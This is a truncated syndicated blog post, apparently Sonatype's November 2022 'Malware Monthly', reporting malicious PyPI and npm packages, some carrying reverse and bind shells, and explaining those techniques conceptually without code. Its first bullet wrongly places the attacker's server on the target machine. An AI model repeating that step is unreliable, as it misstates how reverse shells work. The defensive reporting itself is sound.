SBN

Malware Monthly – November 2022

 

Welcome to the first edition of Malware Monthly, where our teams of security researchers and developer advocates bring you the latest information on malicious and suspicious packages discovered in software registries.

As developers, it is important to stay informed about the latest security vulnerabilities and threats in order to keep your build environments protected. This monthly publication aims to provide you with the information and insights you need to stay one step ahead of the bad actors and keep your projects safe.

For this November edition of Malware Monthly, our security researchers discovered and analyzed nearly 350 packages flagged as malicious, suspicious, or dependency confusion proof-of-concepts in PyPI and npm registries. Also, we dug a little deeper into two of the discovered packages.

Additionally, we explored what an exploit against the OpenSSL vulnerabilities could do and how dependency management could resolve the issues.

The ones that caught our attention

We discovered packages such as tshawn-lrce and tshawn-wrce that are tainted with malicious reverse shell and bind shell scripts. If you’re not familiar with these techniques, think of a reverse shell as a setup where:

  • An attacker starts a server instance on the target machine.
  • The target downloads and inadvertently executes the malicious packages in their build environment.
  • The target machine becomes a client that connects to the attacker’s server.
  • The attacker gains access to the target machine and can execute commands.

Bind shells are similar in that they also establish a backdoor connection between the attacker and the target, but in this case, they create an open port on the target machine instead of establishing a connection from the target to the attacker. With an opened port, the attacker can execute commands on the target machine.

Other packages our security researchers found, such as requests-dm, fastupdate, and (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Sonatype Developer Relations. Read the original post at: https://blog.sonatype.com/malware-monthly-november-2022